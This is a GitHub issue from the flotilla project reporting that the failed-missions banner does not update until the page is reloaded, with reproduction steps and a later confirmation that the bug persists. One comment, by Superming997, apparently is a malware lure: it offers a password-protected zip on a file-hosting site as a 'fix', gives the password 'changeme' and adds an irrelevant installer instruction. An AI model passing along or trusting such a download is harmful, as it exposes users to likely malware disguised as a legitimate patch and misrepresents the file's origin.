equinor/flotilla #1724: Failed missions banner don't pop up or update when missions fail

Eddasol, 2024-08-26:
**Describe the bug**
When missions fail the banner doesn't pop up or update unless the page gets reloaded

**To Reproduce**
Steps to reproduce the behavior:
*  Get a mission to fail (when testing locally its possible to shut down the ISAR instance of a robot running a mission)
* Note the banner
* Reload the page
* Note that the banner is updated

**Expected behavior**
The banner should update without needing a refresh

**Screenshots**
Image with several failed missions but a banner indicating 2 recently failed missions. After a reload the number of recently failed missions in the banner got updated to 5.
[image]

Superming997, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Eddasol, 2025-05-12:
Still occurs